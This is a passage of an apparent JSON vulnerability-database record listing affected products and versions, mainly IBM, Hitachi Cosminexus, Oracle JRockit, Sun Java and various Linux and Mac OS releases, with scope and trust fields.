"enterprise server x86 64", "scope": "eq", "trust": 0.3, "vendor": "mandrakesoft", "version": "5" }, { "model": "jdk 07", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5" }, { "model": "cosminexus primary server base )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-51" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8.2" }, { "model": "ucosminexus application server smart edition )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2.3" }, { "model": "ucosminexus application server standard 06-70-/a (windows(ip", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "jrockit r28.0.1", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.21" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.3" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.3" }, { "model": "cosminexus application server version 05-00-/s", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "5" }, { "model": "cosminexus application server standard version )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "606-51" }, { "model": "infosphere streams", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0" }, { "model": "cosminexus primary server base 06-02-/g", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2.2" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2.1" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2.4" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6" }, { "model": "ucosminexus application server enterprise 06-70-/q", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.14" }, { "model": "tivoli workload scheduler distributed", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6" }, { "model": "ucosminexus developer light", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-71" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.19" }, { "model": "jrockit r27.6.7", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "jrockit r27.6.0", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "hp-ux b.11.31", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.1" }, { "model": "cosminexus studio version", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "505-01" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.1" }, { "model": "jre 07", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.23" }, { "model": "websphere dynamic process edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "satellite (for rhel", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6)5.6" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.10" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "13.10" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.11" }, { "model": "ucosminexus client 06-71-/m", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cosminexus developer professional version 06-51-/b", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "linux enterprise java sp2", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.2143" }, { "model": "cosminexus developer standard version 06-51-/e", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "ucosminexus application server enterprise 06-70-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1.3" }, { "model": "cosminexus developer light version 06-51-/e", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.1" }, { "model": "systems director storage control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.4.0" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.6.8" }, { "model": "ucosminexus application server express )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "tivoli dynamic workload console", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4" }, { "model": "ucosminexus application server standard", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1.1" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.4" }, { "model": "ucosminexus application server express (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.2.170" }, { "model": "cosminexus primary server base 06-50-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.3.4" }, { "model": "enterprise linux desktop optional", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "ucosminexus client )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "enterprise linux hpc node supplementary", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux desktop supplementary client", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8.5" }, { "model": "lotus notes fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.35" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.32" }, { "model": "ucosminexus developer professional 06-70-/f", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "linux enterprise software development kit sp2", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.13" }, { "model": "cosminexus application server standard version 06-00-/b", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "ucosminexus application server light )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.021" }, { "model": "jdk 0 03", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5" }, { "model": "ucosminexus application server enterprise )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "core", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "9" }, { "model": "cosminexus application server enterprise version )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "606-02" }, { "model": "infosphere streams", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2.3" }, { "model": "jrockit r28.2.2", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "ucosminexus application server standard-r )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "cosminexus primary server base 06-02-/f", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cosminexus application server version 05-05-/r", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "5" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.029" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.0.1" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.3" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.31" }, { "model": "ucosminexus client 06-70-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus developer standard 06-72-/d", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "trio tview software", "scope": "ne", "trust": 0.3, "vendor": "schneider electric", "version": "3.29.0" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2.2" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2.1" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8.1" }, { "model": "tivoli dynamic workload console", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6.0.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.0" }, { "model": "ucosminexus application server standard (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "lotus notes fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.33" }, { "model": "ucosminexus developer standard 06-70-/p", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus client 06-71-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cosminexus studio version 05-05-/o", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "5" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "cosminexus studio version 05-05-/r", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "5" }, { "model": "ucosminexus primary server base )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "jrockit r27.7.4", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "cosminexus studio version 05-00-/s", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "5" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.2" }, { "model": "ucosminexus application server light )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus application server light (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "lotus notes fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.32" }, { "model": "cosminexus client version 06-02-/g", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "infosphere streams", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.27" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.1" }, { "model": "ucosminexus service platform )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-50" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.7" }, { "model": "websphere business services fabric", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.1" }, { "model": "cosminexus studio version 05-01-/l", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "5" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.3" }, { "model": "ucosminexus application server standard 06-71-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server light )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "websphere business services fabric for z/os", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.0" }, { "model": "cosminexus developer version 05-00-/i", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "5" }, { "model": "ucosminexus developer professional", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-70" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.7" }, { "model": "lotus domino 8.5.1fp5", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "13.04" }, { "model": "suse core for", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "9x86" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.4" }, { "model": "nsmexpress", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "jrockit r27.1.0", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "tivoli workload scheduler z/os connector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "cosminexus client version 06-50-/b", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "enterprise linux supplementary server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.18" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.1" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.2" }, { "model": "jrockit r28.1.4", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.2" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.31" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "ucosminexus client", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "enterprise linux desktop client", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.1.185" }, { "model": "jrockit r27.6.6", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "network and security manager software r7", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.4" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2" }, { "model": "ucosminexus application server enterprise )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "cosminexus client version 06-00-/b", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "jrockit r27.6.8", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "websphere process server hypervisor edition for red hat", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1.2" }, { "model": "cosminexus primary server base 06-50-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.33" }, { "model": "cosminexus developer professional version 06-51-/n", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.1" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.45" }, { "model": "ucosminexus developer light 06-70-/f", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "tivoli endpoint manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.17" }, { "model": "cosminexus developer light version )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "606-02" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.2" }, { "model": "cosminexus developer standard version 06-50-/b", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.12" }, { "model": "linux lts", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "cosminexus application server enterprise version 06-02-/f", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "jre beta", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5.0" }, { "model": "java sdk", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.2" }, { "model": "cosminexus application server enterprise version 06-00-/b", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "websphere real time sr6", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1.1" }, { "model": "jrockit r28.2.3", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "jrockit r27.6.4", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "cosminexus developer standard version 06-50-/e", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "cosminexus primary server base 06-50-/b", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cosminexus developer standard version 06-02-/d", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "websphere application server", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.8" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.31" }, { "model": "ucosminexus client )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "vcenter server", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.5" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.1" }, { "model": "i5/os v6r1m0", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "cosminexus application server version 05-05-/o", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "5" }, { "model": "cosminexus application server enterprise version 06-50-/e", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "jrockit r27.7.6", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "network and security manager software r5", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5" }, { "model": "business process manager standard", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "websphere process server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.3" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "ucosminexus client", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-72" }, { "model": "network and security manager software r8", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "enterprise linux workstation optional", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "ucosminexus developer light", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-70" }, { "model": "tivoli netcool/omnibus", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.02" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.6" }, { "model": "business process manager express", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5" }, { "model": "systems director storage control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.2.0" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2" }, { "model": "ucosminexus service architect )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "tivoli storage manager administration center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "ucosminexus application server enterprise", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-72" }, { "model": "ucosminexus developer standard", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "jrockit r28.2.6", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "cosminexus client version )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "606-02" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.11" }, { "model": "cosminexus application server enterprise version 06-50-/b", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "java sdk", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.4" }, { "model": "cosminexus developer light version 06-02-/f", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "ucosminexus application server express )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "ucosminexus service architect )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "jdk 0 09", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.2" }, { "model": "jrockit r27.7.2", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "cosminexus application server version 05-01-/l", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "5" }, { "model": "ucosminexus application server standard )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "cosminexus primary server base 06-51-/b", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "enterprise linux server optional", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.29" }, { "model": "cosminexus application server standard version 06-51-/e", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "websphere real time sr5", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.5" }, { "model": "lotus domino fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.34" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "cosminexus application server standard version 06-50-/i", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "cosminexus developer professional version 06-02-/d", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "ucosminexus application server standard-r )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "cosminexus developer version 05-05-/r", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "5" }, { "model": "jdk 1.6.0 01-b06", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "lotus notes fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.34" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "6" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.3.0" }, { "model": "linux", "scope": null, "trust": 0.3, "vendor": "gentoo", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.32" }, { "model": "jdk 1.5.0.0 03", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "websphere partner gateway advanced edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.1.2" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5.1" }, { "model": "websphere application server", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "8.5.5.2" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7" }, { "model": "infosphere information server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1" }, { "model": "cosminexus developer standard version )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "606-02" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.27" }, { "model": "tivoli provisioning manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.5" }, { "model": "ucosminexus application server enterprise (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "tivoli netcool/omnibus", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.4" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.20" }, { "model": "ucosminexus application server express )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "cosminexus application server standard version 06-02-/d", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "lotus domino fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.25" }, { "model": "os", "scope": "ne", "trust": 0.3, "vendor": "apple", "version": "x2013-005" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.17" }, { "model": "lotus domino fp4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2" }, { "model": "tivoli workload scheduler z/os connector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "infosphere streams", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2" }, { "model": "ucosminexus application server standard-r (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "ucosminexus application server standard", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "cosminexus developer version 05-00-/s", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "5" }, { "model": "ucosminexus application server smart edition )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-50" }, { "model": "jrockit r28.2.8", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "business process manager advanced", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.0" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.10" }, { "model": "jrockit r27.6.2", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "cosminexus developer professional version 06-02-/f", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "cosminexus developer standard version 06-50-/i", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.25" }, { "model": "websphere process server hypervisor edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "cosminexus application server standard version 06-50-/e", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "linux enterprise java sp3", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.13" }, { "model": "ucosminexus developer standard 06-70-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1.5" }, { "model": "ucosminexus application server standard-r )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "jrockit r28.2.4", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "ucosminexus application server smart edition (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "lotus domino 8.5fp1", "scope": null, "trust": 0.3, 